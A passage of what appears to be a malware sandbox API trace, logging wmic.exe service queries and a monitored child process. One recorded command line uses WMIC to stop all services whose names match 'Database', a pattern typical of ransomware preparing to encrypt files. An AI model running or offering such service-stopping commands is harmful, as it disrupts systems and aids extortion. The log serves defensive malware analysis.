dwFlags=0x0, lpMultiByteStr=0xff843e20, cbMultiByte=-1, lpWideCharStr=0x30d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0254.229] free (_Block=0x30d590) [0254.229] malloc (_Size=0x18) returned 0x30d590 [0254.229] SysStringLen (param_1=" WHERE ") returned 0x7 [0254.229] SysStringLen (param_1="name like '%%IISADMIN%%'") returned 0x18 [0254.229] malloc (_Size=0x18) returned 0x30d5b0 [0254.229] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0254.229] SysStringLen (param_1=" WHERE name like '%%IISADMIN%%'") returned 0x1f [0254.229] free (_Block=0x30d550) [0254.229] free (_Block=0x30d590) [0254.229] free (_Block=0x30d570) [0254.229] free (_Block=0x30cce0) [0254.229] malloc (_Size=0x18) returned 0x30cce0 [0254.230] IWbemServices:ExecQuery (in: This=0x1c93b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%IISADMIN%%'", lFlags=48, pCtx=0x0, ppEnum=0xaf5c8 | out: ppEnum=0xaf5c8*=0x1c93c28) returned 0x0 [0254.236] free (_Block=0x30cce0) [0254.236] CoSetProxyBlanket (pProxy=0x1c93c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0254.264] IEnumWbemClassObject:Next (in: This=0x1c93c28, lTimeout=-1, uCount=0x1, apObjects=0xaf5d0, puReturned=0xaf758 | out: apObjects=0xaf5d0*=0x0, puReturned=0xaf758*=0x0) returned 0x1 [0254.588] IUnknown:Release (This=0x1c93c28) returned 0x0 [0254.590] free (_Block=0x30d5b0) [0254.590] free (_Block=0x30cd00) [0254.590] free (_Block=0x30cca0) [0254.590] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.591] free (_Block=0x30ccc0) [0254.591] free (_Block=0x30d1c0) [0254.591] free (_Block=0x30d140) [0254.591] free (_Block=0x30d0c0) [0254.591] free (_Block=0x30d060) [0254.591] free (_Block=0x30d000) [0254.591] free (_Block=0x30d290) [0254.591] free (_Block=0x30d210) [0254.591] free (_Block=0x30cf80) [0254.591] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.591] GetCurrentThreadId () returned 0xabc [0254.591] ??0CHString@@QEAA@PEBG@Z () returned 0xafae8 [0254.591] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xafae8 [0254.591] malloc (_Size=0x800) returned 0x30dd20 [0254.591] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x30dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0254.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0254.592] malloc (_Size=0x1c) returned 0x30cf80 [0254.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x30cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0254.592] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0254.592] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0254.592] free (_Block=0x30cf80) [0254.592] free (_Block=0x30dd20) [0254.592] ??1CHString@@QEAA@XZ () returned 0x3a7d3b01 [0254.592] WbemLocator:IUnknown:Release (This=0x1c93b28) returned 0x0 [0254.593] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0254.593] _kbhit () returned 0x0 [0254.594] free (_Block=0x30cf60) [0254.594] free (_Block=0x30cb00) [0254.594] free (_Block=0x30cae0) [0254.594] free (_Block=0x30cac0) [0254.594] free (_Block=0x30caa0) [0254.594] free (_Block=0x30cdc0) [0254.594] free (_Block=0x307140) [0254.594] free (_Block=0x30cf00) [0254.595] free (_Block=0x308680) [0254.595] free (_Block=0x30cba0) [0254.595] free (_Block=0x30cbc0) [0254.595] free (_Block=0x306ea0) [0254.595] free (_Block=0x30d4d0) [0254.595] free (_Block=0x30cbe0) [0254.595] free (_Block=0x30cc40) [0254.595] free (_Block=0x30d450) [0254.595] free (_Block=0x30d3d0) [0254.595] free (_Block=0x30cc20) [0254.595] free (_Block=0x30cc00) [0254.595] free (_Block=0x30cc60) [0254.595] free (_Block=0x30d370) [0254.595] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0254.595] free (_Block=0x30ce60) [0254.595] free (_Block=0x30cb40) [0254.595] free (_Block=0x30cf30) [0254.595] free (_Block=0x30cb80) [0254.595] free (_Block=0x308600) [0254.595] free (_Block=0x30cb60) [0254.595] free (_Block=0x30cb20) [0254.596] free (_Block=0x307f70) [0254.596] free (_Block=0x306980) [0254.596] free (_Block=0x3069d0) [0254.596] free (_Block=0x30cc80) [0254.596] free (_Block=0x306ac0) [0254.596] free (_Block=0x306e80) [0254.596] free (_Block=0x308040) [0254.596] free (_Block=0x306e60) [0254.596] free (_Block=0x308000) [0254.596] free (_Block=0x306e00) [0254.596] free (_Block=0x306e20) [0254.596] free (_Block=0x306ce0) [0254.596] free (_Block=0x306d00) [0254.596] free (_Block=0x306c80) [0254.596] free (_Block=0x306ca0) [0254.596] free (_Block=0x306d40) [0254.596] free (_Block=0x306d60) [0254.596] free (_Block=0x306da0) [0254.596] free (_Block=0x306dc0) [0254.597] free (_Block=0x306bc0) [0254.597] free (_Block=0x306be0) [0254.597] free (_Block=0x306b60) [0254.597] free (_Block=0x306b80) [0254.597] free (_Block=0x306c20) [0254.597] free (_Block=0x306c40) [0254.597] free (_Block=0x306b00) [0254.597] free (_Block=0x306b20) [0254.597] free (_Block=0x306a70) [0254.597] free (_Block=0x306a20) [0254.597] free (_Block=0x30cd30) [0254.597] WbemLocator:IUnknown:Release (This=0x1c81390) returned 0x2 [0254.597] WbemLocator:IUnknown:Release (This=0x1c93a98) returned 0x0 [0254.598] WbemLocator:IUnknown:Release (This=0x1c81390) returned 0x1 [0254.598] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0254.598] WbemLocator:IUnknown:Release (This=0x1c81390) returned 0x0 [0254.598] free (_Block=0x30ca20) [0254.598] free (_Block=0x30ca40) [0254.598] free (_Block=0x308540) [0254.598] free (_Block=0x30ca60) [0254.598] free (_Block=0x30ca80) [0254.598] free (_Block=0x308580) [0254.598] free (_Block=0x30c8a0) [0254.598] free (_Block=0x30c8c0) [0254.598] free (_Block=0x3083c0) [0254.598] free (_Block=0x30c8e0) [0254.598] free (_Block=0x30c900) [0254.598] free (_Block=0x308400) [0254.598] free (_Block=0x30c820) [0254.598] free (_Block=0x30c840) [0254.599] free (_Block=0x308340) [0254.599] free (_Block=0x30c860) [0254.599] free (_Block=0x30c880) [0254.599] free (_Block=0x308380) [0254.599] free (_Block=0x30c9a0) [0254.599] free (_Block=0x30c9c0) [0254.599] free (_Block=0x3084c0) [0254.599] free (_Block=0x30c9e0) [0254.599] free (_Block=0x30ca00) [0254.599] free (_Block=0x308500) [0254.599] free (_Block=0x30c7a0) [0254.599] free (_Block=0x30c7c0) [0254.599] free (_Block=0x3082c0) [0254.599] free (_Block=0x30c7e0) [0254.599] free (_Block=0x30c800) [0254.599] free (_Block=0x308300) [0254.600] free (_Block=0x30c920) [0254.600] free (_Block=0x30c940) [0254.600] free (_Block=0x308440) [0254.600] free (_Block=0x30c960) [0254.600] free (_Block=0x30c980) [0254.600] free (_Block=0x308480) [0254.600] free (_Block=0x30c6e0) [0254.600] free (_Block=0x30c700) [0254.600] free (_Block=0x308200) [0254.600] free (_Block=0x30c5a0) [0254.600] free (_Block=0x30c5c0) [0254.600] free (_Block=0x3080c0) [0254.600] free (_Block=0x30c560) [0254.600] free (_Block=0x30c580) [0254.600] free (_Block=0x308080) [0254.600] free (_Block=0x30c620) [0254.600] free (_Block=0x30c640) [0254.600] free (_Block=0x308140) [0254.600] free (_Block=0x30c720) [0254.601] free (_Block=0x30c740) [0254.601] free (_Block=0x308240) [0254.601] free (_Block=0x30c5e0) [0254.601] free (_Block=0x30c600) [0254.601] free (_Block=0x308100) [0254.601] free (_Block=0x30c660) [0254.601] free (_Block=0x30c680) [0254.601] free (_Block=0x308180) [0254.601] free (_Block=0x30c6a0) [0254.601] free (_Block=0x30c6c0) [0254.601] free (_Block=0x3081c0) [0254.601] free (_Block=0x30c760) [0254.601] free (_Block=0x30c780) [0254.601] free (_Block=0x308280) [0254.601] CoUninitialize () [0254.642] exit (_Code=0) [0254.642] free (_Block=0x306ef0) [0254.642] free (_Block=0x307f30) [0254.642] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.642] free (_Block=0x306fe0) [0254.642] free (_Block=0x306ae0) [0254.642] free (_Block=0x307ef0) [0254.642] free (_Block=0x307eb0) [0254.642] free (_Block=0x307e60) [0254.642] free (_Block=0x307e20) [0254.642] free (_Block=0x305ac0) [0254.642] free (_Block=0x307da0) [0254.642] free (_Block=0x305a80) [0254.642] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0254.642] free (_Block=0x3085c0) Thread: id = 216 os_tid = 0x5b4 Thread: id = 218 os_tid = 0x224 Thread: id = 219 os_tid = 0x760 Thread: id = 220 os_tid = 0xb2c Thread: id = 221 os_tid = 0xb30 Process: id = "27" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1ff20000" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 223 os_tid = 0x6fc [0254.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9f0 | out: lpSystemTimeAsFileTime=0x1ef9f0*(dwLowDateTime=0xad4b0000, dwHighDateTime=0x1d61d49)) [0254.904] GetCurrentProcessId () returned 0x308 [0254.904] GetCurrentThreadId () returned 0x6fc [0254.904] GetTickCount () returned 0x116950f [0254.905] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9f8 | out: lpPerformanceCount=0x1ef9f8*=37507814931) returned 1 [0254.908] GetModuleHandleW (lpModuleName=0x0) returned 0xff460000 [0254.908] __set_app_type (_Type=0x1) [0254.908] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4aced0) returned 0x0 [0254.909] __wgetmainargs (in: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388, _DoWildCard=0, _StartInfo=0xff4d239c | out: _Argc=0xff4d2380, _Argv=0xff4d2390, _Env=0xff4d2388) returned 0 [0254.909] ??0CHString@@QEAA@XZ () returned 0xff4d2ab0 [0254.910] malloc (_Size=0x30) returned 0x2a5a80 [0254.910] malloc (_Size=0x70) returned 0x2a7da0 [0254.910] malloc (_Size=0x50) returned 0x2a5ac0 [0254.910] malloc (_Size=0x30) returned 0x2a7e20 [0254.910] malloc (_Size=0x48) returned 0x2a7e60 [0254.910] malloc (_Size=0x30) returned 0x2a7eb0 [0254.910] malloc (_Size=0x30) returned 0x2a7ef0 [0254.910] ??0CHString@@QEAA@XZ () returned 0xff4d2f58 [0254.910] malloc (_Size=0x30) returned 0x2a7f30 [0254.910] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0254.910] SetConsoleCtrlHandler (HandlerRoutine=0xff4a5724, Add=1) returned 1 [0254.910] _onexit (_Func=0xff4bf378) returned 0xff4bf378 [0254.910] _onexit (_Func=0xff4bf490) returned 0xff4bf490 [0254.910] _onexit (_Func=0xff4bf4d0) returned 0xff4bf4d0 [0254.911] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0254.911] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0254.915] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0254.927] CoCreateInstance (in: rclsid=0xff4673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff467370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff4d2940 | out: ppv=0xff4d2940*=0x1cf1390) returned 0x0 [0254.939] GetCurrentProcess () returned 0xffffffffffffffff [0254.939] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1ef7c0 | out: TokenHandle=0x1ef7c0*=0xf4) returned 1 [0254.939] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ef7b8 | out: TokenInformation=0x0, ReturnLength=0x1ef7b8) returned 0 [0254.939] malloc (_Size=0x118) returned 0x2a6980 [0254.940] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2a6980, TokenInformationLength=0x118, ReturnLength=0x1ef7b8 | out: TokenInformation=0x2a6980, ReturnLength=0x1ef7b8) returned 1 [0254.940] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2a6980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=238325524, Attributes=0x8cc6), (Luid.LowPart=0x0, Luid.HighPart=2785136, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0254.940] free (_Block=0x2a6980) [0254.940] CloseHandle (hObject=0xf4) returned 1 [0254.940] malloc (_Size=0x40) returned 0x2a7f70 [0254.940] malloc (_Size=0x40) returned 0x2a6980 [0254.940] malloc (_Size=0x40) returned 0x2a69d0 [0254.940] malloc (_Size=0x20a) returned 0x2a6a20 [0254.940] GetSystemDirectoryW (in: lpBuffer=0x2a6a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.940] free (_Block=0x2a6a20) [0254.940] malloc (_Size=0x18) returned 0x2a6a20 [0254.940] malloc (_Size=0x18) returned 0x2a6a40 [0254.940] malloc (_Size=0x18) returned 0x2a6a60 [0254.940] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0254.940] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0254.941] free (_Block=0x2a6a20) [0254.941] free (_Block=0x2a6a40) [0254.941] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0254.941] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0254.941] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0254.941] FreeLibrary (hLibModule=0x77940000) returned 1 [0254.942] free (_Block=0x2a6a60) [0254.942] _vsnwprintf (in: _Buffer=0x2a69d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1ef3e8 | out: _Buffer="ms_409") returned 6 [0254.942] malloc (_Size=0x20) returned 0x2a6a20 [0254.942] GetComputerNameW (in: lpBuffer=0x2a6a20, nSize=0x1ef7c0 | out: lpBuffer="XDUWTFONO", nSize=0x1ef7c0) returned 1 [0254.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.942] malloc (_Size=0x14) returned 0x2a6a50 [0254.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.942] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1ef7b8 | out: lpNameBuffer=0x0, nSize=0x1ef7b8) returned 0x7fffffde000 [0254.944] GetLastError () returned 0xea [0254.944] malloc (_Size=0x40) returned 0x2a6a70 [0254.944] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2a6a70, nSize=0x1ef7b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ef7b8) returned 0x1 [0254.944] lstrlenW (lpString="") returned 0 [0254.944] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0254.947] lstrlenW (lpString=".") returned 1 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0254.947] lstrlenW (lpString="LOCALHOST") returned 9 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0254.947] free (_Block=0x2a6a50) [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] malloc (_Size=0x14) returned 0x2a6a50 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] malloc (_Size=0x14) returned 0x2a6ac0 [0254.947] lstrlenW (lpString="XDUWTFONO") returned 9 [0254.947] malloc (_Size=0x8) returned 0x2a6ae0 [0254.947] malloc (_Size=0x18) returned 0x2a6b00 [0254.948] malloc (_Size=0x30) returned 0x2a6b20 [0254.948] malloc (_Size=0x18) returned 0x2a6b60 [0254.948] SysStringLen (param_1="IDENTIFY") returned 0x8 [0254.948] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0254.948] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0254.948] SysStringLen (param_1="IDENTIFY") returned 0x8 [0254.948] malloc (_Size=0x30) returned 0x2a6b80 [0254.948] malloc (_Size=0x18) returned 0x2a6bc0 [0254.948] SysStringLen (param_1="IMPERSONATE") returned 0xb [0254.948] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0254.948] SysStringLen (param_1="IMPERSONATE") returned 0xb [0254.948] SysStringLen (param_1="IDENTIFY") returned 0x8 [0254.948] SysStringLen (param_1="IDENTIFY") returned 0x8 [0254.948] SysStringLen (param_1="IMPERSONATE") returned 0xb [0254.948] malloc (_Size=0x30) returned 0x2a6be0 [0254.948] malloc (_Size=0x18) returned 0x2a6c20 [0254.948] SysStringLen (param_1="DELEGATE") returned 0x8 [0254.948] SysStringLen (param_1="IDENTIFY") returned 0x8 [0254.948] SysStringLen (param_1="DELEGATE") returned 0x8 [0254.948] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0254.948] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0254.948] SysStringLen (param_1="DELEGATE") returned 0x8 [0254.948] malloc (_Size=0x30) returned 0x2a6c40 [0254.948] malloc (_Size=0x18) returned 0x2a6c80 [0254.948] malloc (_Size=0x30) returned 0x2a6ca0 [0254.949] malloc (_Size=0x18) returned 0x2a6ce0 [0254.949] SysStringLen (param_1="NONE") returned 0x4 [0254.949] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.949] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.949] SysStringLen (param_1="NONE") returned 0x4 [0254.949] malloc (_Size=0x30) returned 0x2a6d00 [0254.949] malloc (_Size=0x18) returned 0x2a6d40 [0254.949] SysStringLen (param_1="CONNECT") returned 0x7 [0254.949] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.949] malloc (_Size=0x30) returned 0x2a6d60 [0254.949] malloc (_Size=0x18) returned 0x2a6da0 [0254.949] SysStringLen (param_1="CALL") returned 0x4 [0254.949] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.949] SysStringLen (param_1="CALL") returned 0x4 [0254.949] SysStringLen (param_1="CONNECT") returned 0x7 [0254.949] malloc (_Size=0x30) returned 0x2a6dc0 [0254.949] malloc (_Size=0x18) returned 0x2a6e00 [0254.949] SysStringLen (param_1="PKT") returned 0x3 [0254.949] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.949] SysStringLen (param_1="PKT") returned 0x3 [0254.949] SysStringLen (param_1="NONE") returned 0x4 [0254.949] SysStringLen (param_1="NONE") returned 0x4 [0254.949] SysStringLen (param_1="PKT") returned 0x3 [0254.949] malloc (_Size=0x30) returned 0x2a6e20 [0254.949] malloc (_Size=0x18) returned 0x2a6e60 [0254.950] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.950] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.950] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.950] SysStringLen (param_1="NONE") returned 0x4 [0254.950] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.950] SysStringLen (param_1="PKT") returned 0x3 [0254.950] SysStringLen (param_1="PKT") returned 0x3 [0254.950] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.950] malloc (_Size=0x30) returned 0x2a8000 [0254.950] malloc (_Size=0x18) returned 0x2a6e80 [0254.950] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0254.951] SysStringLen (param_1="DEFAULT") returned 0x7 [0254.951] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0254.951] SysStringLen (param_1="PKT") returned 0x3 [0254.951] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0254.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.951] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0254.951] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0254.951] malloc (_Size=0x30) returned 0x2a8040 [0254.951] malloc (_Size=0x40) returned 0x2a6ea0 [0254.951] malloc (_Size=0x20a) returned 0x2a6ef0 [0254.951] GetSystemDirectoryW (in: lpBuffer=0x2a6ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.951] free (_Block=0x2a6ef0) [0254.951] malloc (_Size=0x18) returned 0x2a6ef0 [0254.951] malloc (_Size=0x18) returned 0x2a6f10 [0254.951] malloc (_Size=0x18) returned 0x2a6f30 [0254.951] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0254.951] SysStringLen (param_1="\\wbem\\") returned 0x6 [0254.951] free (_Block=0x2a6ef0) [0254.951] free (_Block=0x2a6f10) [0254.951] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0254.952] free (_Block=0x2a6f30) [0254.952] malloc (_Size=0x18) returned 0x2a6ef0 [0254.952] malloc (_Size=0x18) returned 0x2a6f10 [0254.952] malloc (_Size=0x18) returned 0x2a6f30 [0254.952] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0254.952] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0254.952] free (_Block=0x2a6ef0) [0254.952] free (_Block=0x2a6f10) [0254.952] GetCurrentThreadId () returned 0x6fc [0254.952] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef0c0 | out: phkResult=0x1ef0c0*=0xf8) returned 0x0 [0254.952] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1ef110, lpcbData=0x1ef0b0*=0x400 | out: lpType=0x0, lpData=0x1ef110*=0x30, lpcbData=0x1ef0b0*=0x4) returned 0x0 [0254.952] _wcsicmp (_String1="0", _String2="1") returned -1 [0254.952] _wcsicmp (_String1="0", _String2="2") returned -2 [0254.952] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1ef0b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1ef0b0*=0x42) returned 0x0 [0254.952] malloc (_Size=0x86) returned 0x2a6f50 [0254.953] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2a6f50, lpcbData=0x1ef0b0*=0x42 | out: lpType=0x0, lpData=0x2a6f50*=0x25, lpcbData=0x1ef0b0*=0x42) returned 0x0 [0254.953] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0254.953] malloc (_Size=0x42) returned 0x2a6fe0 [0254.953] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0254.953] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1ef110, lpcbData=0x1ef0b0*=0x400 | out: lpType=0x0, lpData=0x1ef110*=0x36, lpcbData=0x1ef0b0*=0xc) returned 0x0 [0254.953] _wtol (_String="65536") returned 65536 [0254.953] free (_Block=0x2a6f50) [0254.953] RegCloseKey (hKey=0x0) returned 0x6 [0254.953] CoCreateInstance (in: rclsid=0xff467410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1ef5b8 | out: ppv=0x1ef5b8*=0x22071d0) returned 0x0 [0254.978] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22071d0, xmlSource=0x1ef700*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2a6ef0), isSuccessful=0x1ef770 | out: isSuccessful=0x1ef770*=0xffff) returned 0x0 [0255.157] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22071d0, DOMElement=0x1ef5b0 | out: DOMElement=0x1ef5b0*=0x220bc50) returned 0x0 [0255.157] malloc (_Size=0x18) returned 0x2ac560 [0255.157] IXMLDOMElement:getElementsByTagName (in: This=0x220bc50, tagName="XSLFORMAT", resultList=0x1ef5c0 | out: resultList=0x1ef5c0*=0x2209cc0) returned 0x0 [0255.158] free (_Block=0x2ac560) [0255.158] IXMLDOMNodeList:get_length (in: This=0x2209cc0, listLength=0x1ef788 | out: listLength=0x1ef788*=21) returned 0x0 [0255.159] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=0, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.159] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: 